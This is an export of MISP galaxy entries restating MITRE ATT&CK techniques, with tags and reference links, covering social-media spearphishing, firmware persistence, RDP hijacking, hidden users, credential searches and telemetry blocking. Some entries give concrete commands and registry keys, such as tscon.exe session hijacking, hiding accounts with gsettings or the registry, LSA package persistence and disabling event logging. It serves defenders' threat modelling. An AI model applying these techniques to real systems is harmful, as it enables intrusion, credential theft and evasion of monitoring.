All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Service - T1598.001"

Table 6091. Table References

Links

https://attack.mitre.org/techniques/T1598/001

https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/

Component Firmware - T1542.002

Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.

Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.

The tag is: misp-galaxy:mitre-attack-pattern="Component Firmware - T1542.002"

Table 6092. Table References

Links

https://attack.mitre.org/techniques/T1542/002

https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

https://www.smartmontools.org/

User Evasion - T1628.002

Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device.

While there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.

The tag is: misp-galaxy:mitre-attack-pattern="User Evasion - T1628.002"

Table 6093. Table References

Links

https://attack.mitre.org/techniques/T1628/002

Device Lockout - T1629.002

An adversary may seek to inhibit user interaction by locking the legitimate user out of the device. This is typically accomplished by requesting device administrator permissions and then locking the screen using DevicePolicyManager.lockNow(). Other novel techniques for locking the user out of the device have been observed, such as showing a persistent overlay, using carefully crafted “call” notification screens, and locking HTML pages in the foreground. These techniques can be very difficult to get around, and typically require booting the device into safe mode to uninstall the malware.(Citation: Microsoft MalLockerB)(Citation: Talos GPlayed)(Citation: securelist rotexy 2018)

Prior to Android 7, device administrators were able to reset the device lock passcode to prevent the user from unlocking the device. The release of Android 7 introduced updates that only allow device or profile owners (e.g. MDMs) to reset the device’s passcode.(Citation: Android resetPassword)

The tag is: misp-galaxy:mitre-attack-pattern="Device Lockout - T1629.002"

Table 6094. Table References

Links

https://attack.mitre.org/techniques/T1629/002

https://blog.talosintelligence.com/2018/10/gplayedtrojan.html

https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/

https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/

Systemd Service - T1543.002

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.

Systemd utilizes unit configuration files with the .service file extension to encode information about a service’s process. By default, system level unit files are stored in the /systemd/system directory of the root owned directories (/). User level unit files are stored in the /systemd/user directories of the user owned directories ($HOME).(Citation: lambert systemd 2022)

Inside the .service unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)

  • ExecStart, ExecStartPre, and ExecStartPost directives execute when a service is started manually by systemctl or on system start if the service is set to automatically start.

  • ExecReload directive executes when a service restarts.

  • ExecStop, ExecStopPre, and ExecStopPost directives execute when a service is stopped.

Adversaries have created new service files, altered the commands a .service file’s directive executes, and modified the user directive a .service file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016)

The tag is: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002"

Table 6095. Table References

Links

http://man7.org/linux/man-pages/man1/systemd.1.html

http://www.ouah.org/backdoors.html

https://attack.mitre.org/techniques/T1543/002

https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/

https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/

https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang

https://www.freedesktop.org/software/systemd/man/systemd.service.html

https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence

Bash History - T1552.003

Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)

The tag is: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003"

Table 6096. Table References

Links

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1552/003

Code Signing - T1553.002

Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002"

Table 6097. Table References

Links

http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates

https://attack.mitre.org/techniques/T1553/002

https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/

https://en.wikipedia.org/wiki/Code_signing

https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

RDP Hijacking - T1563.002

Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)

Adversaries may perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)

The tag is: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002"

Table 6098. Table References

Links

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

https://attack.mitre.org/techniques/T1563/002

https://github.com/nccgroup/redsnarf

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx

Asymmetric Cryptography - T1573.002

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.

For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).

The tag is: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002"

Table 6099. Table References

Links

http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1573/002

https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html

DNS Server - T1583.002

Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.

By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)

The tag is: misp-galaxy:mitre-attack-pattern="DNS Server - T1583.002"

Table 6100. Table References

Links

https://attack.mitre.org/techniques/T1583/002

https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/

Search Engines - T1593.002

Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)

Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Engines - T1593.002"

Table 6101. Table References

Links

https://attack.mitre.org/techniques/T1593/002

https://securitytrails.com/blog/google-hacking-techniques

https://www.exploit-db.com/google-hacking-database

Call Log - T1636.002

Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log.

If the device has been jailbroken or rooted, an adversary may be able to access the [Call Log](https://attack.mitre.org/techniques/T1636/002) without the user’s knowledge or approval.

The tag is: misp-galaxy:mitre-attack-pattern="Call Log - T1636.002"

Table 6102. Table References

Links

https://attack.mitre.org/techniques/T1636/002

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

TFTP Boot - T1542.005

Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.

Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005"

Table 6103. Table References

Links

https://attack.mitre.org/techniques/T1542/005

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

https://tools.cisco.com/security/center/resources/integrity_assurance.html#23

https://tools.cisco.com/security/center/resources/integrity_assurance.html#26

https://tools.cisco.com/security/center/resources/integrity_assurance.html#35

https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

Private Keys - T1552.004

Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.

Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)

When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)

On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as crypto pki export.(Citation: cisco_deploy_rsa_keys)

Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.

The tag is: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004"

Table 6104. Table References

Links

https://aadinternals.com/post/deviceidentity/

https://attack.mitre.org/techniques/T1552/004

https://en.wikipedia.org/wiki/Public-key_cryptography

https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf

https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token

https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436

Hidden Users - T1564.002

Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.

In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value <code>Hide500Users</code> to <code>TRUE</code> in the <code>/Library/Preferences/com.apple.loginwindow</code> plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the <code>Hide500Users</code> key value is set to <code>TRUE</code>, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the <code>dscl</code> utility to create hidden user accounts by setting the <code>IsHidden</code> attribute to <code>1</code>. Adversaries can also hide a user’s home folder by changing the <code>chflags</code> to hidden.(Citation: Apple Support Hide a User Account)

Adversaries may similarly hide user accounts in Windows. Adversaries can set the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList</code> Registry key value to <code>0</code> for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)

On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the <code>gsettings</code> command (ex: <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002"

Table 6105. Table References

Links

https://attack.mitre.org/techniques/T1564/002

https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf

https://support.apple.com/en-us/HT203998

https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

https://www.us-cert.gov/ncas/alerts/TA18-074A

Authentication Package - T1547.002

Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)

Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.

The tag is: misp-galaxy:mitre-attack-pattern="Authentication Package - T1547.002"

Table 6106. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/techniques/T1547/002

https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx

https://technet.microsoft.com/en-us/library/dn408187.aspx

DNS Server - T1584.002

Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.

By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization’s traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)

The tag is: misp-galaxy:mitre-attack-pattern="DNS Server - T1584.002"

Table 6107. Table References

Links

https://attack.mitre.org/techniques/T1584/002

https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

https://blogs.cisco.com/security/talos/angler-domain-shadowing

https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/

https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows

Client Configurations - T1592.004

Adversaries may gather information about the victim’s client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004"

Table 6108. Table References

Links

https://attack.mitre.org/techniques/T1592/004

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://threatconnect.com/blog/infrastructure-research-hunting/

Reflection Amplification - T1498.002

Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.

Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Reflection Amplification - T1498.002"

Table 6109. Table References

Links

https://attack.mitre.org/techniques/T1498/002

https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/

https://blog.cloudflare.com/reflections-on-reflections/

https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/

https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/

Securityd Memory - T1555.002

An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)

The tag is: misp-galaxy:mitre-attack-pattern="Securityd Memory - T1555.002"

Table 6110. Table References

Links

http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1555/002

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Container API - T1552.007

Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)

An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod’s service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.

The tag is: misp-galaxy:mitre-attack-pattern="Container API - T1552.007"

Table 6111. Table References

Links

https://attack.mitre.org/techniques/T1552/007

https://docs.docker.com/engine/api/v1.41/

https://kubernetes.io/docs/concepts/overview/kubernetes-api/

https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/

Email Accounts - T1585.002

Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)

To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002"

Table 6112. Table References

Links

https://attack.mitre.org/techniques/T1585/002

https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Chat Messages - T1552.008

Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.

Rather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).

The tag is: misp-galaxy:mitre-attack-pattern="Chat Messages - T1552.008"

Table 6113. Table References

Links

https://attack.mitre.org/techniques/T1552/008

https://www.nightfall.ai/blog/saas-slack-security-risks-2020

Silver Ticket - T1558.002

Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)

Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)

Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).

The tag is: misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002"

Table 6114. Table References

Links

https://adsecurity.org/?p=1515

https://adsecurity.org/?p=2011

https://attack.mitre.org/techniques/T1558/002

https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

Vulnerability Scanning - T1595.002

Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002"

Table 6115. Table References

Links

https://attack.mitre.org/techniques/T1595/002

https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning

Indicator Blocking - T1562.006

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).

For example, adversaries may modify the File value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).

